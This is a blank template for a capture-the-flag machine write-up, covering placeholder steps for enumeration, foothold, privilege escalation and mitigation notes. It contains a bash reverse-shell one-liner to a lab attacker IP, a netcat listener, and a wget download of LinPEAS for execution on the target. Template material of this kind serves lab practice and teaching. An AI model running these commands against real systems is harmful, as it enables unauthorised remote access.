Test
Box Information
| Property | Value |
|---|---|
| Name | Test |
| OS | Linux |
| Difficulty | Medium |
| IP | 10.10.11.x |
Summary
Key Vulnerabilities:
- Vulnerability 1
- Vulnerability 2
- Vulnerability 3
Enumeration
Nmap Scan
Initial scan:
nmap -sC -sV -oA nmap/ 10.10.11.x
Results:
| Port | Service | TCP/UDP |
|---|---|---|
Key findings:
- Service 1: Description
- Service 2: Description
Web Enumeration
Directory brute-forcing:
gobuster dir -u http://10.10.11.x -w /usr/share/wordlists/dirb/common.txt
Discovered endpoints:
/admin- Admin panel/api- REST API/uploads- File upload directory
Technology stack:
- Framework:
- Language:
- Database:
Port XXX Enumeration
Initial Foothold
Vulnerability Discovery
Vulnerability: [Vulnerability Name]
Testing the vulnerability:
# Commands used to test/verify the vulnerability
Proof of Concept:
# Exploit code or script
import requests
url = "http://10.10.11.x/vulnerable-endpoint"
payload = {}
response = requests.post(url, data=payload)
print(response.text)
Exploitation
Step 1: [Action taken]
# Commands
Step 2: [Next action]
# Commands
Getting a shell:
# Reverse shell command
bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
Listener:
nc -lvnp 4444
User Flag
Stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
Enumerate the system:
whoami
id
uname -a
pwd
ls -la
User flag location:
cat /home/user/user.txt
flag{user_flag_here}
Privilege Escalation
Enumeration as [username]
Check sudo privileges:
sudo -l
Check for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Check for interesting files:
find / -name "*.conf" 2>/dev/null | grep -v "proc\|sys"
Running LinPEAS:
# On attacker machine
python3 -m http.server 8000
# On target
wget http://10.10.14.x:8000/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
Lateral Movement (if applicable)
[!info] Moving to [next user] Explanation of how to move laterally
Exploitation:
# Commands to switch users
Root Escalation
Vulnerability: [Escalation method]
[!warning] Exploitation Path Detailed explanation of the privilege escalation vulnerability
Exploitation steps:
Step 1:
# Command
Step 2:
# Command
Step 3:
# Command
[!success] Root Access Successfully escalated privileges to root
Root Flag
whoami
# root
cat /root/root.txt
flag{root_flag_here}
Post-Exploitation
Flags:
- User:
flag{user_flag_here} - Root:
flag{root_flag_here}
Completion time: X hours
Lessons Learned
Vulnerabilities Identified
- [Vulnerability 1]
- Impact: High/Medium/Low
- Affected component:
- Exploitation difficulty: Easy/Medium/Hard
- [Vulnerability 2]
- Impact:
- Affected component:
- Exploitation difficulty:
Mitigation Recommendations
For [Vulnerability 1]:
- Recommendation 1
- Recommendation 2
- Recommendation 3
For [Vulnerability 2]:
- Recommendation 1
- Recommendation 2
Key Techniques Used
- Technique 1 with brief explanation
- Technique 2 with brief explanation
- Technique 3 with brief explanation
Things That Didn’t Work
[!failure] Dead Ends
- Rabbit hole 1: Why it didn’t work
- Rabbit hole 2: What I learned from it
Tools Used
| Tool | Purpose | Command/Usage |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV target |
| gobuster | Directory enumeration | gobuster dir -u URL -w wordlist |
| burpsuite | Web traffic analysis | Interactive |
| linpeas | Linux enumeration | ./linpeas.sh |
| custom exploit | Specific vulnerability | python3 exploit.py |
References
- Vulnerability Name - CVE-XXXX-XXXXX
- GTFOBins - Tool
- HackTricks - Technique
- OWASP - Vulnerability Type
Timeline
graph LR
A[Nmap Scan] --> B[Web Enum]
B --> C[Vuln Discovery]
C --> D[Initial Shell]
D --> E[User Flag]
E --> F[PrivEsc Enum]
F --> G[Root Shell]
G --> H[Root Flag]
Pwned on: January 22, 2026
Difficulty Rating: ☭☭☭☭ (Personal rating)
Fun Factor: ☭☭☭☭☭☁(How enjoyable was it?)